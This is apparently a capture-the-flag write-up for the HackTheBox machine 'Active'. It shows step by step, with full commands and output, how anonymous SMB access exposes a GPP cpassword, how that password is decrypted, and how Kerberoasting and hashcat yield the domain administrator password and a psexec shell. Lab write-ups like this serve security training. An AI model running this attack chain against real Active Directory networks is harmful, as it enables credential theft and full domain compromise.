Active

#ActiveDirectory #Default_Credentials #Weak_Permissions #Anonymous_Access

Active is an easy-rated Windows machine from HackTheBox, created by eks and mrb3n. In the current post, my IP is 10.10.14.210, and the target IP is 10.129.38.41

Recon

The first steps are about getting basic information about the target, by using nmap and searching information from the website.

Local Terminal

ping -c 1 10.129.38.41

PING 10.129.38.41 (10.129.38.41) 56(84) bytes of data.
64 bytes from 10.129.38.41: icmp_seq=1 ttl=63 time=202 ms

--- 10.129.38.41 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 202.335/202.335/202.335/0.000 ms

What a weird TTL for a Windows Machine...

Local Terminal

nmap -p- --open -sS --min-rate 5000 -vvv -n 10.129.38.41

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 126
88/tcp    open  kerberos-sec     syn-ack ttl 126
135/tcp   open  msrpc            syn-ack ttl 126
139/tcp   open  netbios-ssn      syn-ack ttl 126
389/tcp   open  ldap             syn-ack ttl 126
445/tcp   open  microsoft-ds     syn-ack ttl 126
464/tcp   open  kpasswd5         syn-ack ttl 126
593/tcp   open  http-rpc-epmap   syn-ack ttl 126
636/tcp   open  ldapssl          syn-ack ttl 126
3268/tcp  open  globalcatLDAP    syn-ack ttl 126
3269/tcp  open  globalcatLDAPssl syn-ack ttl 126
5722/tcp  open  msdfsr           syn-ack ttl 126
9389/tcp  open  adws             syn-ack ttl 126
47001/tcp open  winrm            syn-ack ttl 126
49153/tcp open  unknown          syn-ack ttl 126
49154/tcp open  unknown          syn-ack ttl 126
49155/tcp open  unknown          syn-ack ttl 126
49157/tcp open  unknown          syn-ack ttl 126
49158/tcp open  unknown          syn-ack ttl 126
49162/tcp open  unknown          syn-ack ttl 126
49166/tcp open  unknown          syn-ack ttl 126
49168/tcp open  unknown          syn-ack ttl 126

And then we try to get the version and run basic scripts with Nmap in each port.

Local Terminal

nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49153,49154,49155,49157,49158,49162,49166,49168 10.129.38.41

Nmap scan report for 10.129.38.41
Host is up (0.17s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-26 21:17:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49162/tcp open  msrpc         Microsoft Windows RPC
49166/tcp open  msrpc         Microsoft Windows RPC
49168/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-08-26T21:18:39
|_  start_date: 2024-08-26T18:53:23

Quite a few open ports! Normal in Windows... now, we are interested in the port that manages the SMB environment; these are ports 139 and 445. Therefore, we will use basic tools for their exploration.

SMB Enumeration

Local Terminal

enum4linux -a 10.129.38.41

=================================( Share Enumeration on 10.129.38.41 )================
do_connect: Connection to 10.129.38.41 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.129.38.41

//10.129.38.41/ADMIN$   Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/C$       Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/IPC$     Mapping: OK Listing: DENIED Writing: N/A
//10.129.38.41/NETLOGON Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/Replication      Mapping: OK Listing: OK Writing: N/A
//10.129.38.41/SYSVOL   Mapping: DENIED Listing: N/A Writing: N/A
//10.129.38.41/Users    Mapping: DENIED Listing: N/A Writing: N/A

The only relevant information comes from "Share Enumeration," where we list the shared resources and determine which ones are visible to the Anonymous user; in this case, it is "Replication." Now, we will review it using smbclient or smbmap.

Exploring Replication

With smbclient, you can explore manually, but with smbmap, you can recursively extract all the files that you have permission to read.

Local Terminal

smbclient //10.129.38.41/Replication -U ""%""

Local Terminal

smbmap -H 10.129.38.41 -s Replication -r --depth 10

 ./Replication
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    active.htb
        ./Replication//active.htb
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    DfsrPrivate
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    Policies
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    scripts
        ./Replication//active.htb/DfsrPrivate
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ConflictAndDeleted
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    Deleted
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    Installing
        ./Replication//active.htb/Policies
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    {31B2F340-016D-11D2-945F-00C04FB984F9}
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    {6AC1786C-016F-11D2-945F-00C04fB984F9}
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        fr--r--r--               23 Sat Jul 21 10:38:11 2018    GPT.INI
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    Group Policy
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    MACHINE
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    USER
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        fr--r--r--              119 Sat Jul 21 10:38:11 2018    GPE.INI
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    Microsoft
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    Preferences
        fr--r--r--             2788 Sat Jul 21 10:38:11 2018    Registry.pol
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    Windows NT
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    SecEdit
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        fr--r--r--             1098 Sat Jul 21 10:38:11 2018    GptTmpl.inf
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    Groups
        ./Replication//active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        fr--r--r--              533 Sat Jul 21 10:38:11 2018    Groups.xml
        ./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        fr--r--r--               22 Sat Jul 21 10:38:11 2018    GPT.INI
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    MACHINE
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    USER
        ./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    Microsoft
        ./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    Windows NT
        ./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    SecEdit
        ./Replication//active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    .
        dr--r--r--                0 Sat Jul 21 10:37:44 2018    ..
        fr--r--r--             3722 Sat Jul 21 10:38:11 2018    GptTmpl.inf

From the entire list of folders and files, the only thing that seems relevant is "Groups.xml." Let's access and explore the file.

Local Terminal

smbclient //10.129.38.41/Replication -U ""%""

Replication

$ cd \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
$ get Groups.xml
$ exit

Local Terminal

cat Groups.xml | xmllint --format -

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
  </User>
</Groups>

The Groups.xml file appears to be a log document created when a user is added with a group related to Group Policy Preferences (GPP). This is valuable information because, in this context, to use the active.htb user, we need to decrypt the password.

Password Decryption

Since it is a cpassword from GPP (Group Policy Preferences), we can use the following method to decrypt it:

Local Terminal

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

GPPstillStandingStrong2k18

Enumeration with active.htb

Now that we have a username and password, we'll use enum4linux again to see what capabilities we have with these credentials.

Local Terminal

smbmap -H 10.129.38.41 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18

[+] IP: 10.129.38.41:445 Name: 10.129.38.41      Status: Authenticated
        Disk                                    Permissions     Comment
        ----                                    -----------     -------
        ADMIN$                                  NO ACCESS       Remote Admin
        C$                                      NO ACCESS       Default share
        IPC$                                    NO ACCESS       Remote IPC
        NETLOGON                                READ ONLY       Logon server share
        Replication                             READ ONLY
        SYSVOL                                  READ ONLY       Logon server share
        Users                                   READ ONLY

From this list, "Users" seems to be the most interesting... As usual, the flag is likely to be on the desktop. It is important to keep in mind that to log in, you need to use the group associated with the password. In this case, the group is "SVC_TGS."

Local Terminal

smbclient //10.129.38.41/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18

Users

$ cd \SVC_TGS\Desktop\
$ get user.txt
$ exit

Local Terminal

cat user.txt

13a4dcb3da9553209d0833afc10a437d

Within the Impacket suite, there's a script called GetUserSPNs.py that is very useful for finding users vulnerable to Kerberoasting. This attack targets Service Principal Names (SPNs) associated with user accounts in Active Directory that are used for Kerberos authentication. {password: GPPstillStandingStrong2k18}

Local Terminal

GetUserSPNs.py -request -dc-ip 10.129.38.41 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet
   LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 19:06:40.351723  2024-08-26 18:54:29.034950

Local Terminal

cat GetUserSPNs.out

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b9207b9c412fc833f5e326aa92d7950a$f14fefb2e71f22d789a35b624f15741450bbcdfc295544676280b65dd923ed4f9f2756143bbd18be531bba21f4a9b217e7a6e9fec4dbcacb1cb38f2a23ed3b45da0e81c7384b458b69bdff421c5a9282710a387560f78538f997f2ca25083c16ea3330ce49e0d924d67dc896c90116336f7e988bd3e8c2fed0b28d312c9de635c0ad97c15e42980da8494be7dab3c811da02d641e5ef676319ca530e1a82245c7e4103dbbcf516af7b82050121f78243f64137166a55f199c2925ae4f08df3d842b8753e7aabe0a72811c6f83d5ecc7f6e112266e3fa0df1ffbc4a979ceb991e58cbfa8cbf9b0d6a0bcee4a98e1162d808c08aba29e97b337fb431799b0fcc2589a70c17ada8faa13427bfb71b44d21ff5726571ef94f2c310812fcb4c20460bb3e4e0304bb8502fe5f502594a516285bd3f633457f46e63c69802b0c029533ef2802de05534d02491e47b917441ffe61a608899649a6c3ccca3baec687881845d1f8017bb87966a6fc937cd6abdb5b49f1925a0df7c1ac16f2c69280a0a84aac155dedc90924abf2d0de75238012cae0701a99a2e9b5e790a877074431e9fafb10dd054a6bbf17eddec1b91ac372b8b61ba9f963a92db874589a396410c228cbae268a35dc2652784331ef17a4b13069582a6bafb79b7efec10c582af2a42095f893227e4476149ddd5e1c4d3e2d49ebf629592a301fff6c71dd4bcf1d707bd85c343e6ef4943e3cd5d5217769abac21ae86e4eff3502120858f61f466145045c880c5ec85ea551e22306f455d3a3a2a94700b599359fc7f8cabc65d0a7b42384ce1ce985edb578b90a5af0467a0c2cda4b61fd91671d1e4d6a95b4d23736e6389ba43a173c0ef5a7446dcce840a7611bfe36c5a5460e6c150cf188aef2521643494a3a82405354f70bdc20facdb5d698f319057a5dc64944381d65fef47164b417390573217de4d7461e8415782e551d0072a2a456e550f95fb09632d8a4a30b3b720011da396e02acbb06a963aef41a497becd7d00adea7356e02ab3e82a621522fc9604b5488a2142b0862e7ea886d61c528b7705297e43809fa644abedc604afa249b9d57eba57619e9fb69b4c95a504d3e48d898a5b7cb75e1fb1f9108ead613618f77f90e50f2cad7da4fd435f5b286c87ba5b4813ce7570188188351826dfef96884938cbe77a40fe16023dd046cb3d419df2c0b7fdf1067a0191bf49a855381cc102f537f81d0c89f12b1f97cbad951510b477a37c0

Now we just need to decrypt the hash. The good news is that the script outputs the data in a format compatible with Hashcat, making it easier to crack the hash.

Local Terminal

$ hashcat -m 13100 -a 0 GetUserSPNs.out /shared/payload/rockyou.txt --force
$ hashcat -m 13100 -a 0 GetUserSPNs.out /shared/payload/rockyou.txt --force --show

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b9207b9c412fc833f5e326aa92d7950a{...}{...}7c0:Ticketmaster1968

Great! With the password "Ticketmaster1968," we can now check what the admin account has access to—potentially everything. The next step is to access the SMB share and extract the flag.

Local Terminal

smbmap -H 10.129.38.41 -d active.htb -u administrator -p Ticketmaster1968

[+] IP: 10.129.38.41:445Name: 10.129.38.41      Status: ADMIN!!!
        Disk                                    Permissions     Comment
        ----                                    -----------     -------
        ADMIN$                                  READ, WRITE     Remote Admin
        C$                                      READ, WRITE     Default share
        IPC$                                    NO ACCESS       Remote IPC
        NETLOGON                                READ, WRITE     Logon server share
        Replication                             READ ONLY
        SYSVOL                                  READ, WRITE     Logon server share
        Users                                   READ ONLY

With admin status confirmed, you have elevated privileges. When exploring the SMB shares, the $C share represents the root of the C: drive, which is indeed the most important and often contains critical files, including potential flags or sensitive information.

Local Terminal

smbclient //10.129.38.41/C$ -U active.htb\\administrator%Ticketmaster1968

$C

$ cd \users\administrator\desktop\
$ get root.txt
$ exit

Local Terminal

cat root.txt

ce53b45c12214816f72f7f69ae9ecce4

Alternativa

With the credentials confirmed as valid, you can use them to gain shell access on the target system. Given the password "Ticketmaster1968," you can attempt to connect via different methods like SMB or WinRM to obtain a shell.

psexec.py active.htb/administrator@10.10.10.100